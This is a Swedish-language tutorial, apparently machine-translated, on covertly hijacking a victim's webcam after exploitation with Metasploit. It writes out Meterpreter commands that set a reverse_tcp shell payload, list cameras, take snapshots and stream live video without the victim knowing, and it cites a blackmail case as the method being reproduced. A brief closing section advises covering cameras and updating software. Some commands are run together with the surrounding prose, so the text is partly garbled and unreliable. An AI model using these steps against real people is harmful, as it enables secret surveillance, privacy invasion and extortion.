i den här handledningen tar vi en titt på hur vi kan hacka in i en webbkamera i hemlighet och på distans via internet och ta en titt på vad som händer på andra sidan. Vi använder den kraftfulla Meterpreter och Kali Linux för att hacka in i offrets webbkamera. Vi tar full kontroll över webbkameran, slår på den, får ögonblicksbilder och till och med strömmar livevideo utan att någon någonsin får reda på det.
i början av 2014 dömdes en hacker till 18 månader för att göra just detta till Miss Teen USA 2013. Han hittade en sårbarhet i hennes dator (som någon föråldrad programvara), tog några kompromissbilder från webbkameran och utpressade offret för att skicka fler foton. Metoden Han använde är precis vad vi ska prova här.
vår bästa vänmeterpreter kommer att hjälpa oss med detta hack. Med Meterpreter kan vi styra någons webbkamera, installera en keylogger eller plantera dina egna virus, stjäla privata data och göra nästan vad som helst på offrets dator.
För denna handledning antar jag att du redan har använt en attackmodul för att utnyttja en sårbarhet med Metasploit (hur man gör det här?). Låt oss nu komma till det.
hur hacka webbkameror?
Steg 1: Ställ in meterpreter.
När vi framgångsrikt har utnyttjat offret har vi nu möjlighet att ställa in en nyttolast efter vårt val. Nyttolasten berättar metasploit vad man ska göra på offrets dator när den bryter in. Meterpreter är vår nyttolast. Följande kommando ställer in vår nyttolast:
set payload windows/meterpreter/reverse_tcpom attacken lyckades installerar metasploit automatiskt meterpreter på målsystemet och vi kan gå vidare till att hacka webbkameran.
steg 2: Hitta webbkameran.
Meterpreter har en inbyggd modul för att söka och styra fjärrsystemets webbkamera. Vi kan börja med att söka om systemet ens har en webbkamera eller not.me. kommandot nedan används för det, det returnerar oss också namnet på webbkameran.
meterpreter > webcam_listoch nu ska du se ditt måls webbkamera(er) listade i utgången.
steg 3: Ta ögonblicksbilder
om det sista kommandot gav oss en webbkamera kan vi gå vidare och knäppa ett foto:
meterpreter > webcam_snapoch nu ska du se en bild har sparats i mappen /opt/framework3/msf3 helt enkelt gå dit
steg 4: strömma realtidsvideo från den hackade webbkameran
så vi tog bara en bild, låt oss se hur man får en live videoström. Vi kan göra detta genom att skriva kommandot nedan: (Vi använder –p parameter för att ange katalogen vi vill ge till videostreamingsfilen)
meterpreter > run webcam -p /var/wwwdetta kommando bränder upp offrets webbkamera och skickar sin videoutgång till /var/www/webcam.htm. Du kan öppna den här filen och kolla vad som händer i andra änden i en live videoström.
Hur förhindrar du att din egen webbkamera hackas?
det finns flera sätt att hacka in webbkameror. I exemplet ovan, med bara några små kommandon kan vi kika in i vårt offers webbkamera. Varje erfaren säkerhetsexpert kommer att berätta att inget system är helt säkert. Det är därför du alltid bör hålla dina kameror täckta när de inte används. Personligen använder jag den här lilla gadgeten på både min bärbara dator och smartphone.
men det betyder inte att du inte ska bry dig om att hålla ditt operativsystem och applikationer uppdaterade, tvärtom faktiskt. Om en hackare kan få kontroll över din webbkamera har ditt system framgångsrikt utnyttjats, det är effektivt nu en bot, en slav av angriparen. Detta innebär att angriparen kan göra vad som helst på ditt system: få tillgång till dina privata data, se allt du skriver samt alla webbplatser du besöker.
vilken enhet använder du just nu? En smartphone? En bärbar dator? Chansen är stor att du stirrar direkt på en kamera. Känner du dig plötsligt lite orolig? Det borde du. Ta inga chanser. Om du helt enkelt täcka upp dina kameror och rutinmässigt uppdatera all din programvara kan du undvika att bli offer för en webbkamera hacka själv.